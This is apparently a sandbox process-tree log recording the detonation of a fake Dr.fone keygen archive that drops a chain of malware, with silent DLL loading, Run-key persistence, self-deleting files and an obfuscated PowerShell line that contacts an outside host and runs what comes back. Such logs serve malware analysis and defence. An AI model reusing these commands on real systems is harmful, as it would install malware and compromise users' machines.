C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4280 /prefetch:82⤵PID:4632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4944 /prefetch:82⤵PID:4692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5072 /prefetch:82⤵PID:4780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4564 /prefetch:82⤵PID:4864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5024 /prefetch:82⤵PID:4900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4816 /prefetch:82⤵PID:4936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4876 /prefetch:82⤵PID:4988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5340 /prefetch:82⤵PID:5024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5336 /prefetch:82⤵PID:5064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:82⤵PID:5100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5604 /prefetch:82⤵PID:4124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5948 /prefetch:82⤵PID:4272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6060 /prefetch:82⤵PID:4460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5928 /prefetch:82⤵PID:4572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5488 /prefetch:82⤵PID:4592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5544 /prefetch:82⤵PID:4636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 /prefetch:82⤵PID:4728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:82⤵PID:4656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4932 /prefetch:82⤵PID:4624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:12⤵PID:4744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:82⤵PID:4872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6196 /prefetch:82⤵PID:4892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6312 /prefetch:82⤵PID:4976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6480 /prefetch:82⤵PID:5088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6600 /prefetch:82⤵PID:4232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6728 /prefetch:82⤵PID:4900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6852 /prefetch:82⤵PID:4936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6888 /prefetch:82⤵PID:4244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:12⤵PID:5024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7252 /prefetch:82⤵PID:1356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:82⤵PID:4216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7680 /prefetch:82⤵PID:4568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7808 /prefetch:82⤵PID:1736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7812 /prefetch:12⤵PID:4660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7964 /prefetch:82⤵PID:4648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8112 /prefetch:82⤵PID:5012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8384 /prefetch:82⤵PID:4884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8404 /prefetch:82⤵PID:4164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8528 /prefetch:82⤵PID:4160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3464 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7812 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4340 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4928
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2616
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2428
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2248
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1844
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1404
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1224
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1104
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1032 -
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe2⤵
- Suspicious use of SetThreadContext
PID:584 -
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"3⤵PID:5468
-
-
-
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe2⤵
- Suspicious use of SetThreadContext
PID:8912 -
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"3⤵PID:10572
-
-
-
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe2⤵
- Suspicious use of SetThreadContext
PID:4024 -
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"3⤵PID:10428
-
-
-
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe2⤵PID:9196
-
-
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe2⤵PID:10268
-
-
C:\Users\Admin\AppData\Local\8065b13e-c302-4ea8-9d27-9b2555360c2b\9C8.exeC:\Users\Admin\AppData\Local\8065b13e-c302-4ea8-9d27-9b2555360c2b\9C8.exe --Task2⤵PID:9884
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3644 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
PID:4968
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4696
-
C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.key.generator.zip\Wondershare.Dr.fone.For.5.5.0.key.generator.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.key.generator.zip\Wondershare.Dr.fone.For.5.5.0.key.generator.exe"1⤵PID:5008
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵PID:4724
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
PID:5072 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
PID:4836 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4860
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4492
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3732 -
C:\Users\Admin\AppData\Roaming\59E.tmp.exe"C:\Users\Admin\AppData\Roaming\59E.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2328 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\59E.tmp.exe"5⤵PID:6048
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:6572
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵PID:5028
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:3988 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵PID:2352
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Checks computer location settings
PID:2096 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe" 1 3.1617987546.607087da3fb62 1016⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1400 -
C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe" 2 3.1617987546.607087da3fb627⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\rgfmy05vre5\mt1fu32iu4k.exe"C:\Users\Admin\AppData\Local\Temp\rgfmy05vre5\mt1fu32iu4k.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:4816 -
C:\Users\Admin\AppData\Local\Temp\is-E03SM.tmp\mt1fu32iu4k.tmp"C:\Users\Admin\AppData\Local\Temp\is-E03SM.tmp\mt1fu32iu4k.tmp" /SL5="$803B0,140785,56832,C:\Users\Admin\AppData\Local\Temp\rgfmy05vre5\mt1fu32iu4k.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\is-BGO43.tmp\apipostback.exe"C:\Users\Admin\AppData\Local\Temp\is-BGO43.tmp\apipostback.exe" adan adan10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5344 -
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\X8AVSnMKi.dll"11⤵PID:6560
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\X8AVSnMKi.dll"12⤵PID:6812
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\X8AVSnMKi.dll"13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:6832
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\X8AVSnMKi.dllkWQZGC5bM.dll"11⤵PID:7000
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\X8AVSnMKi.dllkWQZGC5bM.dll"12⤵PID:6996
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:5400
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵
- Blocklisted process makes network request
PID:5364
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rmsgqo3cqri\ywjzhunjyey.exe"C:\Users\Admin\AppData\Local\Temp\rmsgqo3cqri\ywjzhunjyey.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:2476 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ywjzhunjyey.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\rmsgqo3cqri\ywjzhunjyey.exe" & exit9⤵PID:7156
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
PID:5288
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ywjzhunjyey.exe" /f10⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Kills process with taskkill
PID:5524
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sdefmc0uvrn\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\sdefmc0uvrn\KiffApp1.exe"8⤵
- Executes dropped EXE
PID:5140
-
-
C:\Users\Admin\AppData\Local\Temp\slzzpl2izqr\vpn.exe"C:\Users\Admin\AppData\Local\Temp\slzzpl2izqr\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
PID:5188 -
C:\Users\Admin\AppData\Local\Temp\is-UOTLF.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-UOTLF.tmp\vpn.tmp" /SL5="$303CE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\slzzpl2izqr\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5228 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:6072
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:5104
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:7036
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:8140
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\su4x1srlkmx\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\su4x1srlkmx\Setup3310.exe" /Verysilent /subid=5778⤵PID:5220
-
C:\Users\Admin\AppData\Local\Temp\is-I57U4.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-I57U4.tmp\Setup3310.tmp" /SL5="$303E0,138429,56832,C:\Users\Admin\AppData\Local\Temp\su4x1srlkmx\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5300 -
C:\Users\Admin\AppData\Local\Temp\is-EGM5D.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EGM5D.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6352 -
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6460 -
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:6528 -
